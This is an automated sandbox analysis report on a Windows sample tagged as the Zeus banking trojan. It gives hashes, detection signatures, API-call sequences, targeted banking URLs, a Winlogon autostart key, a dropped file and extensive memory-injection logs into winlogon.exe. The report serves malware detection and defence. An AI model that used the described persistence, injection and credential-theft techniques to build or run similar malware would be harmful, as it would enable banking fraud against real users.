Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report glGb1KYfX6

Overview

General Information

Sample Name:glGb1KYfX6 (renamed file extension from none to exe)
Analysis ID:368363
MD5:8944bc22235936b73bdf874bfa4d1a64
SHA1:6f48fb18ffd6497fbdc951b4d96340e878921d91
SHA256:d1bf7ec60bcb74dd395f92a1ddb5a2a66e9913514e0f7428681e9a8d7fe25b1e
Tags:zeus1
Infos:

Most interesting Screenshot:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
Allocates memory in foreign processes
Changes memory attributes in foreign processes to executable or writable
Contains functionality to change the desktop window for a process (likely to hide graphical interactions)
Creates an undocumented autostart registry key
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
May sleep (evasive loops) to hinder dynamic analysis
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider

Classification

Startup

  • System is w10x64
  • glGb1KYfX6.exe (PID: 4144 cmdline: 'C:\Users\user\Desktop\glGb1KYfX6.exe' MD5: 8944BC22235936B73BDF874BFA4D1A64)
    • winlogon.exe (PID: 560 cmdline: MD5: F9017F2DC455AD373DF036F5817A8870)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: Windows Processes Suspicious Parent DirectoryShow sources
Source: Process startedAuthor: vburov: Data: Command: , CommandLine: , CommandLine|base64offset|contains: , Image: C:\Windows\System32\winlogon.exe, NewProcessName: C:\Windows\System32\winlogon.exe, OriginalFileName: C:\Windows\System32\winlogon.exe, ParentCommandLine: 'C:\Users\user\Desktop\glGb1KYfX6.exe' , ParentImage: C:\Users\user\Desktop\glGb1KYfX6.exe, ParentProcessId: 4144, ProcessCommandLine: , ProcessId: 560

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Antivirus / Scanner detection for submitted sampleShow sources
Source: glGb1KYfX6.exeAvira: detected
Antivirus detection for dropped fileShow sources
Source: C:\Windows\SysWOW64\sdra64.exeAvira: detection malicious, Label: TR/ATRAPS.Gen2
Multi AV Scanner detection for submitted fileShow sources
Source: glGb1KYfX6.exeVirustotal: Detection: 87%Perma Link
Source: glGb1KYfX6.exeReversingLabs: Detection: 91%
Machine Learning detection for dropped fileShow sources
Source: C:\Windows\SysWOW64\sdra64.exeJoe Sandbox ML: detected
Machine Learning detection for sampleShow sources
Source: glGb1KYfX6.exeJoe Sandbox ML: detected
Source: 0.0.glGb1KYfX6.exe.400000.0.unpackAvira: Label: TR/ATRAPS.Gen2
Source: 0.1.glGb1KYfX6.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen3
Source: C:\Users\user\Desktop\glGb1KYfX6.exeCode function: 0_2_004101CA CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,0_2_004101CA
Source: glGb1KYfX6.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
Source: C:\Users\user\Desktop\glGb1KYfX6.exeCode function: 0_2_0040B844 PathCombineW,FindFirstFileW,PathMatchSpecW,PathCombineW,FindNextFileW,FindClose,0_2_0040B844
Source: C:\Users\user\Desktop\glGb1KYfX6.exeCode function: 0_2_00413853 FindFirstFileW,FindClose,FindFirstFileW,FindClose,CreateMutexW,MoveFileExW,0_2_00413853
Source: C:\Users\user\Desktop\glGb1KYfX6.exeCode function: 0_2_00413682 PathCombineW,FindFirstFileW,wnsprintfW,PathCombineW,FindNextFileW,FindClose,0_2_00413682
Source: C:\Users\user\Desktop\glGb1KYfX6.exeCode function: 0_2_004048AC PathCombineW,FindFirstFileW,PathCombineW,WaitForSingleObject,RtlEnterCriticalSection,PathMatchSpecW,PathCombineW,wnsprintfW,WaitForSingleObject,RtlLeaveCriticalSection,Sleep,FindNextFileW,FindClose,0_2_004048AC
Source: C:\Users\user\Desktop\glGb1KYfX6.exeCode function: 0_2_00407F27 ExpandEnvironmentStringsW,FindFirstFileW,PathRemoveFileSpecW,PathCombineW,FindNextFileW,FindClose,0_2_00407F27
Source: C:\Users\user\Desktop\glGb1KYfX6.exeCode function: 0_2_0040C598 SHGetSpecialFolderPathW,PathCombineW,FindFirstFileW,PathRemoveFileSpecW,PathCombineW,WideCharToMultiByte,FindNextFileW,FindClose,0_2_0040C598
Source: C:\Users\user\Desktop\glGb1KYfX6.exeCode function: 0_2_00411DB9 PathCombineW,FindFirstFileW,PathCombineW,PathCombineW,FindNextFileW,FindClose,0_2_00411DB9
Source: C:\Users\user\Desktop\glGb1KYfX6.exeCode function: 0_2_00407066 InternetReadFile,0_2_00407066
Source: winlogon.exe, 00000002.00000002.465403884.000000000D741000.00000040.00000001.sdmpString found in binary or memory: https://bc.nsk.
Source: glGb1KYfX6.exe, 00000000.00000002.459555222.00000000023A3000.00000004.00000040.sdmpString found in binary or memory: https://onlineeast#.bankofamerica.com/cgi-bin/ias/
Source: glGb1KYfX6.exe, winlogon.exe, 00000002.00000002.465403884.000000000D741000.00000040.00000001.sdmpString found in binary or memory: https://www.faktura.ru/enter.jsp?site=
Source: glGb1KYfX6.exe, 00000000.00000002.459555222.00000000023A3000.00000004.00000040.sdmp, winlogon.exe, 00000002.00000002.465403884.000000000D741000.00000040.00000001.sdmpString found in binary or memory: https://www.faktura.ru/enter.jsp?site=%S
Source: C:\Users\user\Desktop\glGb1KYfX6.exeCode function: 0_2_0040652B GetClipboardData,GlobalFix,GlobalUnWire,0_2_0040652B
Source: C:\Users\user\Desktop\glGb1KYfX6.exeCode function: 0_2_0040668F GetTickCount,GetCurrentProcessId,wnsprintfW,GetKeyState,GetKeyState,GetKeyboardState,ToUnicode,WideCharToMultiByte,0_2_0040668F
Source: C:\Users\user\Desktop\glGb1KYfX6.exeCode function: 0_2_0040AE64 CreateFileW,NtQueryObject,lstrcpyW,CloseHandle,0_2_0040AE64
Source: C:\Users\user\Desktop\glGb1KYfX6.exeCode function: 0_2_00406266 NtQueryDirectoryFile,NtQueryObject,lstrcmpiW,0_2_00406266
Source: C:\Users\user\Desktop\glGb1KYfX6.exeCode function: 0_2_00405F35 NtCreateFile,PathRemoveFileSpecW,PathCombineW,CreateFileW,CloseHandle,0_2_00405F35
Source: C:\Users\user\Desktop\glGb1KYfX6.exeCode function: 0_2_00407BE9 NtQueryInformationProcess,CreateToolhelp32Snapshot,Thread32First,Thread32Next,CloseHandle,NtCreateThread,0_2_00407BE9
Source: C:\Users\user\Desktop\glGb1KYfX6.exeCode function: 0_2_0040B4C6 GetProcAddress,LoadLibraryA,GetProcAddress,FreeLibrary,GetForegroundWindow,GetWindowThreadProcessId,OpenProcess,OpenProcessToken,CloseHandle,DuplicateTokenEx,LoadLibraryA,GetProcAddress,GetProcAddress,CreateProcessAsUserW,CloseHandle,CloseHandle,CreateProcessW,CloseHandle,CloseHandle,0_2_0040B4C6
Source: C:\Users\user\Desktop\glGb1KYfX6.exeCode function: 0_2_0040B938 ExitWindowsEx,0_2_0040B938
Source: C:\Users\user\Desktop\glGb1KYfX6.exeFile created: C:\Windows\SysWOW64\sdra64.exeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeCode function: 0_2_004100D70_2_004100D7
Source: C:\Users\user\Desktop\glGb1KYfX6.exeCode function: 0_2_004103AE0_2_004103AE
Source: glGb1KYfX6.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
Source: glGb1KYfX6.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: sdra64.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: classification engineClassification label: mal100.evad.winEXE@1/2@0/0
Source: C:\Users\user\Desktop\glGb1KYfX6.exeCode function: 0_2_004045A1 CertOpenSystemStoreW,PFXExportCertStore,PFXExportCertStore,GetSystemTime,wnsprintfW,CertDuplicateCertificateContext,CertDeleteCRLFromStore,CertEnumCertificatesInStore,CertCloseStore,0_2_004045A1
Source: C:\Users\user\Desktop\glGb1KYfX6.exeCode function: 0_2_00411622 OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,0_2_00411622
Source: C:\Users\user\Desktop\glGb1KYfX6.exeCode function: 0_2_0040B135 CreateToolhelp32Snapshot,GetUserNameW,lstrcpyW,SHGetSpecialFolderPathW,Process32FirstW,lstrcmpiW,OpenProcess,K32GetModuleFileNameExW,PathCombineW,lstrcmpiW,lstrcmpiW,CloseHandle,Process32NextW,CloseHandle,CloseHandle,CloseHandle,0_2_0040B135
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMutant created: \Sessions\1\BaseNamedObjects\_AVIRA_21099
Source: glGb1KYfX6.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\glGb1KYfX6.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: glGb1KYfX6.exeVirustotal: Detection: 87%
Source: glGb1KYfX6.exeReversingLabs: Detection: 91%
Source: C:\Users\user\Desktop\glGb1KYfX6.exeFile read: C:\Users\user\Desktop\glGb1KYfX6.exeJump to behavior

Data Obfuscation:

barindex
Detected unpacking (changes PE section rights)Show sources
Source: C:\Users\user\Desktop\glGb1KYfX6.exeUnpacked PE file: 0.2.glGb1KYfX6.exe.400000.0.unpack .text:ER;.rdata:R;.data:W; vs .text:ER;.data:W;.reloc:R;.data1:W;
Source: C:\Users\user\Desktop\glGb1KYfX6.exeCode function: 0_2_0040AB9A LoadLibraryA,GetProcAddress,0_2_0040AB9A
Source: initial sampleStatic PE information: section name: .text entropy: 6.93746073005
Source: initial sampleStatic PE information: section name: .text entropy: 6.93746073005
Source: C:\Users\user\Desktop\glGb1KYfX6.exeFile created: C:\Windows\SysWOW64\sdra64.exeJump to dropped file
Source: C:\Users\user\Desktop\glGb1KYfX6.exeFile created: C:\Windows\SysWOW64\sdra64.exeJump to dropped file

Boot Survival:

barindex
Creates an undocumented autostart registry key Show sources
Source: C:\Users\user\Desktop\glGb1KYfX6.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon userinitJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeCode function: 0_2_00408DDB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadCursorW,GetIconInfo,GetCursorPos,DrawIcon,lstrcmpiW,0_2_00408DDB
Source: C:\Users\user\Desktop\glGb1KYfX6.exeDropped PE file which has not been started: C:\Windows\SysWOW64\sdra64.exeJump to dropped file
Source: C:\Users\user\Desktop\glGb1KYfX6.exe TID: 3892Thread sleep count: 196 > 30Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeCode function: 0_2_0040B844 PathCombineW,FindFirstFileW,PathMatchSpecW,PathCombineW,FindNextFileW,FindClose,0_2_0040B844
Source: C:\Users\user\Desktop\glGb1KYfX6.exeCode function: 0_2_00413853 FindFirstFileW,FindClose,FindFirstFileW,FindClose,CreateMutexW,MoveFileExW,0_2_00413853
Source: C:\Users\user\Desktop\glGb1KYfX6.exeCode function: 0_2_00413682 PathCombineW,FindFirstFileW,wnsprintfW,PathCombineW,FindNextFileW,FindClose,0_2_00413682
Source: C:\Users\user\Desktop\glGb1KYfX6.exeCode function: 0_2_004048AC PathCombineW,FindFirstFileW,PathCombineW,WaitForSingleObject,RtlEnterCriticalSection,PathMatchSpecW,PathCombineW,wnsprintfW,WaitForSingleObject,RtlLeaveCriticalSection,Sleep,FindNextFileW,FindClose,0_2_004048AC
Source: C:\Users\user\Desktop\glGb1KYfX6.exeCode function: 0_2_00407F27 ExpandEnvironmentStringsW,FindFirstFileW,PathRemoveFileSpecW,PathCombineW,FindNextFileW,FindClose,0_2_00407F27
Source: C:\Users\user\Desktop\glGb1KYfX6.exeCode function: 0_2_0040C598 SHGetSpecialFolderPathW,PathCombineW,FindFirstFileW,PathRemoveFileSpecW,PathCombineW,WideCharToMultiByte,FindNextFileW,FindClose,0_2_0040C598
Source: C:\Users\user\Desktop\glGb1KYfX6.exeCode function: 0_2_00411DB9 PathCombineW,FindFirstFileW,PathCombineW,PathCombineW,FindNextFileW,FindClose,0_2_00411DB9
Source: C:\Users\user\Desktop\glGb1KYfX6.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeCode function: 0_2_00405C1F LdrGetProcedureAddress,0_2_00405C1F
Source: C:\Users\user\Desktop\glGb1KYfX6.exeCode function: 0_2_0040AB9A LoadLibraryA,GetProcAddress,0_2_0040AB9A
Source: C:\Users\user\Desktop\glGb1KYfX6.exeCode function: 0_2_0040AC42 HeapCreate,GetProcessHeap,RtlAllocateHeap,GetCurrentProcessId,IsBadHugeReadPtr,GetUserDefaultUILanguage,GetUserNameW,0_2_0040AC42
Source: C:\Users\user\Desktop\glGb1KYfX6.exeProcess token adjusted: DebugJump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Allocates memory in foreign processesShow sources
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: 400000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: 400000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: 401000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: 414000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: 416000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: 418000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C940000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C940000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C941000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C954000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C956000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C958000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C960000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C960000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C961000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C974000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C976000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C978000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C980000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C980000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C981000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C994000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C996000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C998000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C9A0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C9A0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C9A1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C9B4000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C9B6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C9B8000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C9C0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C9C0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C9C1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C9D4000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C9D6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C9D8000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C9E0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C9E0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C9E1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C9F4000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C9F6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: C9F8000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CA00000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CA00000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CA01000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CA14000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CA16000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CA18000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CA20000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CA20000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CA21000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CA34000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CA36000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CA38000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CA40000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CA40000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CA41000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CA54000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CA56000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CA58000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CA60000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CA60000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CA61000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CA74000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CA76000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CA78000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CA80000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CA80000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CA81000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CA94000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CA96000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CA98000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CAA0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CAA0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CAA1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CAB4000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CAB6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CAB8000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CAC0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CAC0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CAC1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CAD4000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CAD6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CAD8000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CAE0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CAE0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CAE1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CAF4000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CAF6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CAF8000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CB00000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CB00000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CB01000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CB14000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CB16000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CB18000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CB20000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CB20000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CB21000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CB34000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CB36000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CB38000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CB40000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CB40000 protect: page read and writeJump to behavior
